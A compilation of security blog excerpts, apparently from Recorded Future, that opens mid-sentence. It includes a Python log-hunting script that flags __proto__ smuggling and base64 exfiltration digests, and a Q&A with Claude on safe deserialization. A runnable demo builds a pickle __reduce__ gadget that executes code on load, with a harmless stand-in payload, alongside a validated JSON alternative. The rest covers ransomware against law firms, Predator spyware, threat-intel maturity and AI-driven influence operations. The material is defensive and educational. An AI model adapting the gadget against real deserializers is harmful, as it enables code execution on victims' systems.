RCE means immediate credential harvesting from environment variables, lateral movement via cloud metadata endpoints, and persistence via scheduled tasks or cron jobs. IR playbooks should assume full compromise.
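The hunt described in the list above, run over a handful of access-log records, as an added example that is not code from the page, from Recorded Future, or from the React/Next.js projects. The newline-delimited JSON record layout, the action ID values, the multipart bodies and the exfiltrated string are constructed for the demonstration; the medium-severity rule for a multipart action body with no form-data parts is a heuristic beyond what the page states.

```python
"""Hunting for React2Shell-style Server Action abuse in web access logs.

Added example (not the page's, Recorded Future's, or Next.js's code). The
record layout, action IDs, bodies and digests below are constructed; real
proxy or WAF logs need their own loader.
"""
import base64
import json
import re

PROTO_RE = re.compile(r"__proto__")
# A long base64 blob where a short framework error digest should be is odd.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")


def decode_if_base64_text(value: str):
    """Return decoded text if value is a base64 blob of printable text, else None."""
    if not BASE64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
        return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def score_record(rec: dict) -> list:
    """Apply the hunting rules to one parsed log record; returns findings."""
    headers = {k.lower(): str(v) for k, v in rec.get("headers", {}).items()}
    body = rec.get("body") or ""
    is_action_post = rec.get("method") == "POST" and "next-action" in headers
    findings = []
    if is_action_post and PROTO_RE.search(body):
        findings.append("high: Next-Action POST body references __proto__")
    if (is_action_post
            and headers.get("content-type", "").startswith("multipart/form-data")
            and 'form-data; name="' not in body):
        # Heuristic (assumption): an action body that is multipart by header
        # but carries no form parts is not what a browser form submits.
        findings.append("medium: multipart Next-Action body without form-data parts")
    digest = rec.get("error_digest")
    if digest and decode_if_base64_text(digest) is not None:
        findings.append("high: error digest decodes to text (possible exfil channel)")
    return findings


def triage(lines) -> list:
    """Return [(record id, findings)] for every record that trips a rule."""
    hits = []
    for line in lines:
        rec = json.loads(line)
        findings = score_record(rec)
        if findings:
            hits.append((rec["id"], findings))
    return hits


# Constructed sample log. Record 2 is a normal Server Action call; record 3
# smuggles __proto__ and returns command output in the error digest; record 4
# is a multipart action POST with no form parts and a normal digest.
BOUNDARY = "WebKitFormBoundaryDemo"
EXFIL_DIGEST = base64.b64encode(b"uid=1000(node) gid=1000(node)\n").decode()
ACTION_HEADERS = {"Next-Action": "a1b2c3d4e5f6",
                  "Content-Type": "multipart/form-data; boundary=" + BOUNDARY}
SAMPLE_LOG_LINES = [json.dumps(r) for r in [
    {"id": 1, "method": "GET", "path": "/", "headers": {"User-Agent": "Mozilla/5.0"},
     "status": 200},
    {"id": 2, "method": "POST", "path": "/checkout", "headers": ACTION_HEADERS,
     "body": "--" + BOUNDARY + '\r\nContent-Disposition: form-data; name="0"\r\n\r\n'
             '["cart-42"]\r\n--' + BOUNDARY + "--", "status": 200},
    {"id": 3, "method": "POST", "path": "/checkout", "headers": ACTION_HEADERS,
     "body": "--" + BOUNDARY + '\r\nContent-Disposition: form-data; name="0"\r\n\r\n'
             '{"__proto__":{"polluted":true}}\r\n--' + BOUNDARY + "--",
     "status": 500, "error_digest": EXFIL_DIGEST},
    {"id": 4, "method": "POST", "path": "/checkout", "headers": ACTION_HEADERS,
     "body": "[1,2,3]", "status": 500, "error_digest": "3027483621"},
]]

if __name__ == "__main__":
    for rec_id, findings in triage(SAMPLE_LOG_LINES):
        print(rec_id, findings)
```

Run against real logs, the only part to swap is the loader in `triage`; the rules work on the method, headers, body and digest fields regardless of source.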
AI-generated serialization vulnerability audit
For “Vibe Coders”: A Conversation with Claude Opus 4.5
Q: What’s a proper input validation methodology for deserializing data to avoid security failures?
A: Native serialization formats (Java ObjectInputStream, PHP unserialize, Python pickle, .NET BinaryFormatter) reconstruct objects with behavior, which means arbitrary code can execute during deserialization. The fix is using formats that only transfer data, not executable structures.
Safe alternatives:
1. Data-only interchange formats
JSON (most common)
Protocol Buffers (Google)
FlatBuffers (zero-copy, fast)
MessagePack (binary JSON, compact)
CBOR (binary, IETF standard)
These parse into primitive types and structures—no object instantiation, no code execution.
2. Schema validation on top
JSON Schema
Zod / Yup (JavaScript)
Pydantic (Python)
marshmallow (Python)
Define exactly what shape the data must have. Reject anything that doesn’t match before your application logic ever sees it.
3. When you need objects, build them explicitly
Instead of:
obj = pickle.loads(untrusted_data)  # dangerous: reconstructs arbitrary objects
Do:
data = json.loads(untrusted_data)  # safe parse: primitives only
obj = MyClass(**validated_schema(data))  # explicit construction
4. For config/markup
TOML instead of YAML (no code execution tags)
JSON5 for human-readable config
Avoid YAML’s !!python/object or Ruby’s !ruby/object—or use safe loaders exclusively (yaml.safe_load())
The one-liner: If your serialization format can reconstruct arbitrary types, it’s a vulnerability. Stick to dumb data formats + explicit object construction.
Q: Do modern LLMs know how to securely validate data by default? A: Technically, yes, practically, it’s complicated.
What’s in the training data:
Security research, CVE databases, OWASP guidance
Countless blog posts about pickle/unserialize dangers
Secure coding documentation from every major vendor
So if you ask directly—”Is pickle safe for untrusted data?”—any decent LLM will say no.
The problem:
LLMs are also trained on millions of Stack Overflow answers, tutorials, and GitHub repos that use pickle.load(), unserialize(), and yaml.load() because they’re convenient. When someone asks, “How do I save this object to a file and load it later?” the pattern-match often lands on the dangerous-but-common approach.
What I’ve observed:
Ask for “the fastest way” → often gets insecure code
Ask for “production-ready” or “secure” → better results
Ask without security context → coin flip
The real gap:
LLMs don’t reason about security—they predict likely tokens based on training. They won’t spontaneously say “wait, where is this data coming from?” the way an experienced developer might. The threat model isn’t automatic.
Practical advice for developers using LLM assistants:
Explicitly ask for secure alternatives
Ask “What are the security implications of this code?”
Treat generated code like untrusted input—review it
So yes, the knowledge is in there. But so is a decade of insecure examples, and the LLM doesn’t inherently prioritize one over the other unless prompted.
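The "explicit construction" pattern from the conversation above, carried through as a runnable added example that is not code from the page or from the assistant. The Order class, its fields and schema, and the PICKLE_GADGET_FIRED environment marker used to prove that code ran during unpickling are hypothetical; a real gadget would call os.system or similar instead.

```python
"""Untrusted input: behaviour-reconstructing deserialization vs data-only parsing.

Added example; Order, ORDER_SCHEMA and the PICKLE_GADGET_FIRED marker are
hypothetical and exist only for this demonstration.
"""
import json
import os
import pickle
from dataclasses import dataclass

MARKER = "PICKLE_GADGET_FIRED"


class Malicious:
    """Attacker-defined class: pickle calls the callable returned by
    __reduce__ while loading, so whatever it does runs on the victim."""

    def __reduce__(self):
        # Harmless stand-in for os.system(...): sets an env var we can check.
        return (exec, ("import os; os.environ['%s'] = 'ran'" % MARKER,))


def attacker_payload() -> bytes:
    """What an attacker sends: a serialized object with behaviour, not data."""
    return pickle.dumps(Malicious())


def vulnerable_load(blob: bytes):
    """Dangerous path: types and behaviour are reconstructed from the input."""
    return pickle.loads(blob)  # the gadget executes before this returns


def gadget_fired() -> bool:
    """True once the payload above has been unpickled in this process."""
    return os.environ.get(MARKER) == "ran"


@dataclass(frozen=True)
class Order:
    order_id: str
    quantity: int
    sku: str


# Exact shape the endpoint accepts: field name -> required type.
ORDER_SCHEMA = {"order_id": str, "quantity": int, "sku": str}


def validate_order(data) -> dict:
    """Reject anything that does not match ORDER_SCHEMA exactly."""
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object")
    unexpected = set(data) - set(ORDER_SCHEMA)
    if unexpected:  # catches __proto__, __class__ and any other smuggled key
        raise ValueError("unexpected keys: %s" % sorted(unexpected))
    missing = set(ORDER_SCHEMA) - set(data)
    if missing:
        raise ValueError("missing keys: %s" % sorted(missing))
    for name, typ in ORDER_SCHEMA.items():
        if type(data[name]) is not typ:  # exact check: bool is a subclass of int
            raise ValueError("%s must be %s" % (name, typ.__name__))
    if data["quantity"] <= 0 or len(data["sku"]) > 64:
        raise ValueError("field out of range")
    return data


def safe_load(raw: bytes) -> Order:
    """Safe path: parse into plain data, validate the shape, construct explicitly."""
    data = json.loads(raw)  # only dict/list/str/int/float/bool/None come out
    return Order(**validate_order(data))


def is_rejected(raw: bytes) -> bool:
    """True if safe_load refuses the input (parse failure or schema failure)."""
    try:
        safe_load(raw)
    except ValueError:  # JSONDecodeError and UnicodeDecodeError are ValueErrors
        return True
    return False


if __name__ == "__main__":
    vulnerable_load(attacker_payload())
    print("gadget fired during pickle.loads:", gadget_fired())
    print(safe_load(b'{"order_id": "A-1001", "quantity": 2, "sku": "WIDGET"}'))
    print("pickle bytes rejected by safe path:", is_rejected(attacker_payload()))
```

Feeding the pickle bytes to `safe_load` fails at the parse step, and a JSON object that carries an extra `__proto__` key fails at the schema step; nothing in either path ever looks up a type named by the input.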
Stay Ahead with Recorded Future
Learn how Recorded Future's Vulnerability Intelligence tracks CVE disclosures, monitors exploit availability across GitHub and underground forums, and prioritizes vulnerabilities based on active threats to your environment. The platform compresses your response window from days to hours.
In the wake of the Salesforce/Gainsight breach (kudos to Salesforce for transparently sharing indicators of compromise and updated progress on remediation), third-party cyber and exposure risk is top of mind for many CISOs. Professional services firms are often overlooked in this context, with disastrous consequences.
Law firms, specifically, are particularly vulnerable to creating downstream risk impacts given the nature and purpose of legal services, and adversary targeting is on the rise.
The Industrial Consolidation of Legal Sector Attacks
RansomHub has emerged as 2025's dominant threat after absorbing talent from disrupted groups like LockBit and ALPHV/BlackCat. By offering affiliates a 90/10 profit split versus the standard 70/30, it has attracted the most capable operators in the underground economy. Qilin's Rust-based ransomware has specifically targeted legal entities with payloads built to defeat decryption, making recovery nearly impossible.
Qilin ransomware profile c/o Recorded Future
The chart below, derived from Recorded Future analyst notes tracking ransomware extortion sites, illustrates the growth in ransomware targeting by industry, with legal firms remaining the number one target.
Ransomware victims industry comparison in 2024 and 2025.
These aren’t opportunistic attacks. Threat actors now maintain “dwell times” exceeding weeks inside firm networks, systematically identifying crown jewel intelligence before triggering extortion events. Industrialization means attackers understand exactly what creates maximum leverage: M&A intelligence during active deals, litigation strategies before trial, and decades of retained client data across multiple matters.
Recorded Future telemetry from the past quarter indicates that over 20 observed legal or legally adjacent firms have malware communicating with malicious command-and-control (C2) servers. While the observed traffic was 24 hours or less for some firms, other organizations saw persistence above 5 days. Certainly, a malicious implant does not equate to a full breach and exfiltration of client-sensitive data; however, it is a valuable signal to monitor for changes in third-party and fourth-party risk.
Infographic depicting recent malware dwell times in global legal firm victims
When Privilege Becomes Your Adversary’s Weapon
Courts have systematically eroded attorney-client privilege protection for breach investigations, creating a dangerous trap where forensic reports become ammunition for adversaries. The Capital One decision ordered production of Mandiant’s forensic report because the investigator served “business purposes” rather than pure legal advice.
The cascade accelerates through “sword and shield” waiver doctrine. Any use of breach investigation findings, even citing them in discovery responses, can trigger a subject matter waiver, requiring disclosure of all privileged communications related to threat assessment and remediation strategy. The 2024 Samsung Data Breach ruling made this explicit: sharing reports with 15 executives indicated business decision-making use, defeating privilege.
Federal Rule of Evidence 502 creates additional exposure when companies share incident reports with regulators. In the 2023 Covington & Burling case, the SEC subpoenaed the firm for the names of 298 publicly traded clients whose data "may have been exfiltrated." Although a court eventually ruled that only seven clients had to be named, the case established that law firms cannot completely shield client identity from regulators, and those clients could then face SEC investigation for failing to disclose that their counsel was breached.
M&A Intelligence Monetization at Scale
When Berkeley Research Group was hit by ransomware in March 2025 during a $700 million leveraged buyout by TowerBrook Capital Partners, the attack exposed M&A intelligence across hundreds of concurrent deals. This wasn’t just data theft; it was a systematic opportunity for market manipulation.
Academic research quantifies the damage. The Intralinks/Cass Business School study found 8-10% of M&A deals leak annually, with leaked deals achieving 47% median premiums versus 27% for non-leaked deals, which is a 20 percentage point difference worth millions per transaction. Only 49% of leaked deals complete versus 72% of non-leaked deals.
The Tyler Loudon case (2024) showed the value of that access: the defendant stole M&A information from his attorney wife and faced insider trading charges as a result.
The Systematic Failure to Assess Professional Services Risk
Only 30% of law firms report clients asking them to complete security questionnaires (not that attestations are a wholly competent method for determining exposure risk), compared to a near-universal requirement for SaaS vendors. This exemption culture may stem from relationship bias and the misconception that “they’re not a tech vendor” despite law firms operating technology-intensive businesses.
The data concentration goes untracked. A single firm may hold M&A details, employee PII, trade secrets, litigation strategies, regulatory issues, and executive compensation across multiple business units that operate independently. The Orrick breach (2023) exposed 637,000+ individuals precisely because the firm aggregated data from employment litigation, mergers and acquisitions (M&A) transactions, and patent filings.
Retention amnesia compounds the risk. Lawyers traditionally “keep everything forever” due to a risk-averse culture, and potential regulatory requirements. Data from cases in the 1990s may still exist on unpatched legacy servers. Each year of retention adds cumulative breach exposure, yet enterprises rarely ask law firms about deletion policies or data locations.
Strategic Actions for Enterprise Defense
Treating professional services firms as high-risk technology vendors requires structural changes to vendor management frameworks.
Eliminate standing exemptions: Subject law and consulting firms to the same security requirements as SaaS vendors, including SOC 2 verification, independent audits, and quarterly assessments, without granting relationship-based waivers.
Map concentration risk: Identify all professional services vendors with data access across business units. Calculate total organizational exposure when single firms hold aggregated intelligence across HR, legal, finance, and compliance matters.
Audit fourth-party dependencies: Require disclosure of critical vendors, including MSPs, cloud providers, SaaS vendors, and document management systems. A breach of fourth-party infrastructure becomes your breach through the use of API tokens, credential harvesting, and VPN pivoting.
Establish time-bound access: Implement purpose-limited credentials that expire at the conclusion of a matter. Eliminate long-lived access that persists in engagement reports and consulting code repositories.
Define retention requirements: Specify data deletion periods in contracts with confirmation requirements. Audit compliance quarterly, as many firms retain data indefinitely on legacy systems.
Deploy breach detection: Place honeytokens in systems accessible to professional services firms. Establish 24-48 hour notification SLAs with emergency credential rotation capabilities.
Create specialized incident response protocols: Develop playbooks specifically for law firm breaches addressing privilege complications, litigation exposure assessment, and regulatory notification requirements.
Use threat intelligence to map services firms’ domain and IP space. Use the infrastructure map to monitor and alert on observed traffic between malware implants and command-and-control (C2) infrastructure. Recorded Future's Third-Party Intelligence automates this monitoring across your entire vendor ecosystem, providing real-time alerts when professional services firms show compromise indicators. Combined with Ransomware Mitigation capabilities, organizations can track ransomware group TTPs, monitor extortion sites, and receive early warnings when vendors appear on leak sites. Immediately notify affected service providers, disable organizational access, and assist in remediation.
When your law firm holding decades of critical data gets breached, you don’t have a vendor incident. You have a strategic intelligence compromise with multi-year competitive implications that traditional third-party risk frameworks didn’t adequately contemplate, as they exempt “trusted advisors” from the security scrutiny their data concentration demands. The shift from relationship-based trust to risk-based verification isn’t optional; it’s survival.
Learn how Recorded Future's Ransomware Mitigation and Third-Party Intelligence solutions work together to protect against cascading vendor risk. From tracking ransomware groups targeting legal firms to monitoring your vendors for real-time compromise indicators, you can detect and respond to vendor compromises before they cascade into your organization.
The author, Julian-Ferdinand Vögele, thanks Amnesty International's Security Lab for its ongoing reporting on the Intellexa and Predator spyware ecosystem. Today, Security Lab published a related report on Intellexa, which can be found here.
Executive Summary
Insikt Group identified several individuals and entities linked to Intellexa and its broader network of associated companies. These connections span technical, operational, and corporate roles, including backend development, infrastructure setup, and company formation. Using export and import data, Insikt Group identified one entity linked to the previously reported Czech cluster that facilitated the shipment of Intellexa products to clients. In at least one instance, a direct delivery was made to an end user, while additional entities in Kazakhstan and the Philippines appear to have been involved in product imports, indicating an expanding network footprint. Two additional entities in the advertising sector may be tied to the “Aladdin” ad-based infection vector, previously associated with the Czech cluster via a leaked 2022 invoice. In addition, Recorded Future’s proprietary intelligence revealed ongoing Predator spyware activity in multiple countries, including new evidence of its deployment in Iraq.
The continued domestic use of mercenary spyware such as Predator poses significant privacy, legal, and physical security risks worldwide. Although civil society remains the primary target in most publicly documented cases, recent evidence shows that executives and other high-profile individuals with substantial intelligence value are increasingly being targeted as well. Due to Predator’s costly licensing model, operators are likely to reserve its deployment for high-value strategic targets, placing politicians, business leaders, and individuals in sensitive roles at heightened risk. Meanwhile, the widespread and likely unlawful use of spyware against political opposition continues to be a pressing issue under investigation in several European Union (EU) member states, including Poland and Greece.
Insikt Group assesses that several key trends are shaping the spyware ecosystem, including growing balkanization as companies split along geopolitical lines, with some sanctioned entities seeking renewed legitimacy through acquisitions while others shift toward regions with weaker oversight (1, 2). Despite this, a core network of facilitators continues to underpin the industry’s operations. Furthermore, rising competition and secrecy surrounding high-value exploit technologies are heightening risks of corruption, insider leaks, and attacks on spyware vendors themselves. Targeting has also expanded beyond traditional civil society figures to include corporate leaders and private-sector individuals (1, 2), suggesting that the publicly visible cases represent only a fraction of a much larger, concealed global ecosystem.
Key Findings
Insikt Group uncovered additional companies highly likely tied to Intellexa’s broader corporate web, particularly within the previously discussed Czech cluster. At least one of these entities appears to have been used to ship Intellexa products to clients, offering further insight into Intellexa's global business structures.
Two newly identified companies appear to operate in the advertising sector and may be connected to a previously reported ad-based infection vector known as “Aladdin.” This vector was earlier associated with the Czech cluster through a leaked invoice from 2022 showing payments for a proof-of-concept to an individual linked to that cluster.
Analysis of export and import databases revealed indications that one of the newly identified companies was used to deliver Intellexa products to end customers, either directly or through intermediaries. This research also exposed two additional entities located in Kazakhstan and the Philippines.
The Maturity Gap: The Next Frontier in Threat Intelligence
Introduction
In Recorded Future’s 2025 State of Threat Intelligence report, 49% of enterprises describe their threat intelligence maturity as advanced — a figure that might surprise anyone who sees how complex this work remains in practice. While many organizations have made real progress, few have achieved the seamless integration and automation that “advanced” maturity implies.
At the same time, 87% of respondents expect significant improvement within the next two years, showing clear momentum and intent. The gap between today’s capabilities and tomorrow’s ambitions reflects a familiar reality: most teams have the right data but struggle to connect, automate, and operationalize it across their environments.
This article explores what advanced maturity really looks like, why progress often stalls, and how enterprises can accelerate their evolution using insights from this year’s report.
What Advanced Threat Intelligence Maturity Really Means
Recorded Future’s maturity assessment model outlines four stages of progress: Reactive, Proactive, Predictive, and Autonomous. Each stage reflects a higher level of integration, automation, and alignment across the business.
Advanced maturity sits toward the predictive and autonomous end of that model. At this level, intelligence operates continuously, informing security and risk decisions in real time. Teams can see what’s changing across their environment and act quickly to limit impact.
Mature programs pull in data from multiple internal and external sources, from threat feeds and vulnerability scanners to dark web monitoring and attack surface mapping. They use automation to cross-reference that information, enrich alerts with context, and flag the events that matter most. The same intelligence flows directly into the tools that analysts already use, such as SIEM and SOAR platforms, where it can trigger playbooks or prioritize vulnerabilities for patching. The result is less time spent chasing false positives and more time spent preventing real incidents.
Ultimately, advanced maturity is about action. Intelligence should help teams decide faster, target the right adversaries, and strengthen how the SOC, red team, and leadership make decisions every day.
Why Most Organizations Still Struggle to Advance
Even as threat intelligence tools improve, most enterprises still face the same structural barriers that slow maturity. In the 2025 State of Threat Intelligence report, nearly half of respondents (48%) list poor integration with existing security tools among their top three pain points, and 16% rank it as their biggest issue. Siloed feeds and disconnected platforms continue to make it difficult to operationalize intelligence across the security stack.
Another 50% of security professionals cite difficulty verifying the credibility and accuracy of intelligence. Without confidence in the data, analysts hesitate to automate or share findings broadly, keeping threat intelligence trapped in manual workflows and siloed from a wider audience of stakeholders who would benefit from the intelligence.
Though 46% report information overload as a major obstacle, volume isn’t the only issue. It’s also context. The same percentage say intelligence often lacks relevance to their environment, which makes it harder to link threats to business risk or decide what truly deserves attention.
These findings reflect an evolving market need: integration, trust, and relevance. Many teams have invested in more data and technology but still struggle to connect them in ways that deliver measurable improvement. The result is effort without momentum: progress that looks strong on paper but feels limited in day-to-day operations.
How to Build an Advanced Threat Intelligence Function
Closing the maturity gap starts with turning threat intelligence from a standalone feed into a connected ecosystem of security tools that consume and act on that intelligence to inform decision-making in real time. Most teams already have the ingredients (data feeds, automation platforms, and skilled analysts), but they're often fragmented. Progress comes from building workflows that make intelligence part of everyday operations rather than a separate discipline.
Standardize and unify intelligence inputs. Consolidate vendors and combine internal telemetry with external threat data to create a single, reliable view of risk. When data sources align, teams can see the same picture and respond faster.
Automate enrichment and correlation. Replace manual investigation with automated context-building workflows that add detail to alerts as they’re generated. This helps analysts focus on analysis and decision-making instead of repetitive data gathering.
Integrate with core systems. Connect threat intelligence to SIEM, SOAR, EDR, and vulnerability management platforms so insights feed directly into detection and response. Integration reduces delay between visibility and action.
Leverage AI for speed and synthesis. Use AI models to summarize reports, surface anomalies, and streamline triage without increasing headcount. Automation at this level buys time for higher-value analysis.
Translate threats into impact. Map threats to the systems, data, and uptime they affect. When leaders understand operational impact, they can prioritize defenses that protect what matters most.
What Predictive and Autonomous Intelligence Deliver
In Recorded Future’s maturity model, predictive intelligence marks the point where teams move from detection to anticipation. Automation and analytics reveal early warning signs like new attacker infrastructure, emerging vulnerabilities, or shifts in adversary behavior, and feed that insight into prevention and risk planning. Predictive doesn’t mean knowing the future; it means seeing enough of what’s changing to act faster and more precisely.
From here, intelligence systems connect signals across internal telemetry, ISACs, and external threat data to map adversary intent and likely attack paths. That awareness helps teams focus on the exposures most likely to impact their environment, improving visibility and reducing uncertainty before an incident occurs.
At the autonomous stage, those workflows become largely self-directing. Machine learning and automation correlate data, generate detection rules, and trigger responses at a speed and scale that manual teams can’t sustain. Analysts move from running processes to refining them — validating alerts, adjusting priorities, and improving the quality of automation.
Full automation isn’t always possible. Legacy systems, uneven tool coverage, and budget limits mean some work will always remain manual. But even partial autonomy delivers meaningful gains. Teams respond faster, cut repetitive tasks, and keep budgets within their boundaries. Most importantly, they protect uptime, secure sensitive data, and grow customer trust with greater consistency and control.
Closing the Maturity Gap
The 2025 State of Threat Intelligence findings show clear progress, but they also highlight how far most organizations still need to travel. Advanced maturity isn't an end destination, but rather the milestone where intelligence becomes routine, embedded, and measurable across the business.
Bridging the gap requires more than new tools. It takes alignment between technology, people, policy, and process: building workflows that connect intelligence to risk decisions, automating where it adds the most value, and measuring improvement over time. Every organization sits somewhere on this curve. The next step is to understand where you are, identify what’s holding you back, and make incremental changes that move intelligence closer to daily operations.
CopyCop is scaling AI-driven influence operations globally. The Russian influence network known as CopyCop has created more than 300 fake media websites spanning North America, Europe, and beyond. The operation primarily uses AI-generated content to erode public trust and support for Ukraine.
AI has become the new engine of manipulation. The network uses self-hosted large language models (LLMs) to mass-produce fabricated news stories, deepfakes, and fake fact-checking sites that imitate legitimate journalism.
Transparency and intelligence are the best defenses. Governments, newsrooms, and enterprises can counter these operations through domain monitoring, content verification, and proactive intelligence sharing.
Most “AI malware” observed so far falls into the AI malware Maturity Model (AIM3) Levels 1-3 (Experimenting through Optimizing), rather than fully automated campaigns.
AI is currently a force multiplier on existing attacker tradecraft, not a source of fundamentally new TTPs.
Many “first-ever AI malware” announcements are narrow research demos or PoCs with limited autonomy and unclear real-world impact.
Public reporting shows no confirmed examples of truly embedded, Bring-Your-Own-AI (BYOAI) malware running its own local model on victim hosts.
Defenders should prioritize monitoring abuse of legitimate AI services, hardening existing controls, and mapping threats to AIM3 levels rather than overreacting to sci-fi scenarios.